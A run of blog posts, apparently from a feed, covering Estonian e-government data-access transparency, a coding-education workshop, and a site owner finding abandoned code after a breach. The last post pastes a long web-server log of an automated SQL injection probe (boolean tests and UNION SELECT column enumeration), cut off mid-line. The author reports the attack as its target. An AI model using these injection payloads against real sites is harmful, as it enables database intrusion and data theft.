The Estonian system, he explains, is based on “trust”. While the national database can be accessed by the authorities, he stresses, the citizen has to be notified when their records are observed. So if the system hasn’t been built on Blockchain technology, it nonetheless operates on Blockchain-like principles – creating a data system that can’t be altered with notifying both the authorities and citizens.
This is what Ilves calls a “Lockean contract” between digital citizen and the government. The 21st-century networked sovereign, he says, is the guarantor of what he calls “data integrity”. While the government can’t access our data without our knowledge, the citizen no longer has any anonymity in this system.
Problem is, there is no such transparency – no notifications, no place to log in and see who has accessed your data. There was one system with such functionality, but that was shut down like 10 years ago (added: there is one more system now: E-health, sample below). And even when it worked, it displayed only trivial amount of accesses – like if police used the data while identifying me during traffic stop and I had done nothing criminal (my car’s mandatory checkup had expired) that wasn’t visible. As I had also forgotten all my documents (and money) at home I was of course totally in favour of them identifying me via databases… but anyway, there’s no trail of that positive moment that I can show to you.
The rest of the databases? I recall a meeting (in government residence, no less) where the topic was discussed, possibly on a roundtable arranged by National Audit Office. After some serious googling I found a contact address where to submit a request to get information about access to my data in population registry. It took some months to get answer, as supposedly information about who had requested my data was only available in “comments field” and had to be assembled manually. Promoting the idea of requesting such transparency is a good start for denial-of-service attack on Estonian e-government.
Then there was a case when somebody from Ministry of The Interior was promoting some new legislation mandating more data storage with the argument, that everybody is able to see who has been accessing the data, so it is not a privacy violation. Our correspondence ended after couple of rounds, after she was unable to find any proof of solution where I can view the access log.
And don’t get me started on the question of who can purchase the data from our population registry or from business register. Want to get contacts of underemployed pensioners? Give us your monies! Want to spam every e-resident who has created a company? Sure, all addresses in registry must be business contacts so spam away (and give us some monies)!
THI is as kickass president as they ever get – but there is some serious ass-kicking to be done back at home, to cover his own that has been left without notable protection on this trust issue.
Trust in Estonian e-gov databases is completely meme-based. As a citizen I should presumably be able to see, who has accessed my data. As a former tech journalist someone should have told me I’m wrong and shown me the place to see the data. But it’s like… you know, jet fuel doesn’t melt memes.
Correction – There is one system that currently displays access log, Estonian E-Health’s Digilugu.ee “patient portal”. While it is difficult to tell if all accesses are listed I can find most of the cases where I recall having had interactions, like my filling of “health self-assessment” and a doctor accessing it to provide me with proof-of-health needed for driver’s license:
]]>Codecademy was the main topic this time – but as discussed on Saturday in some smaller circles we should not ask “how can we use Codecademy in classroom”, as simply learning to code – or coding – shouldn’t be considered as the target. What are the cool / useful / fun things one could do with code – to create need for learning to code? Like – Minecraft is written in Java, but if you want to create mods you can start with simpler Javascript ScriptCraft mods … and JavaScript can be learned on Codecademy. Hmm, could we create a course for using ScriptCraft? (btw – Minecraft can be used for designing models that can be 3D-printed, see Printcraft and minecraft.print())
Or, for less game-minded – could solving Project Euler math problems be reason to learn programming? Could you do music or paint? Or could you evade surveillance – like in Cory Doctorow’s Little Brother (must-read, mostly culture not code)?
Also – please bear in mind, that programming might NOT be for everybody – as Jeff (who can program) explains in Why Can’t Programmers.. Program?. Let’s make sure all “we’ll teach all kids to code” projects (a) give all kids chance to understand if concept of coding is suitable for their mindset (b) take a wider approach and promote the idea that not everybody developing software is coder: we need at least us much designers, architects, technical writers, testers (you can break things and earn money!) etc.
Actual courses we looked at during workshop:
Playground for your own projects – http://labs.codecademy.com/
Or use (and learn from) http://codepen.io/ or http://jsfiddle.net/
Or open Developer Tools in your browser – or use https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ / http://tampermonkey.net/ plugins.
Or… look what Bret Victor thinks about tools we acutally need for teaching:
]]>While looking at a hacked WordPress site about a year ago I found on the same hosting possibly 5 copies of Drupal – some ancient sub-site for something, backup copy of that, previous version and then some more instances. A survey engine, possibly remains of document management system … etc. Having deobfuscated the code of malware first lines turned out to be starting from root and looking for everything worth infecting. Impossible to fix, only solution is to archive the code (just-in-case…) and delete it.
And seems I should take some time to go systematically through all my / client hostings as this is not the only site with this problem – and I have left abandoned code around myself. That came back to me while looking for yet another breach and spotting the following lines in logfile:
176.10.100.229 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:55 +0300] "GET /newsletter/index.php?id=999999.9 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%27%20or%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3E1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%27 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:02 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:03 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:04 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:06 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET 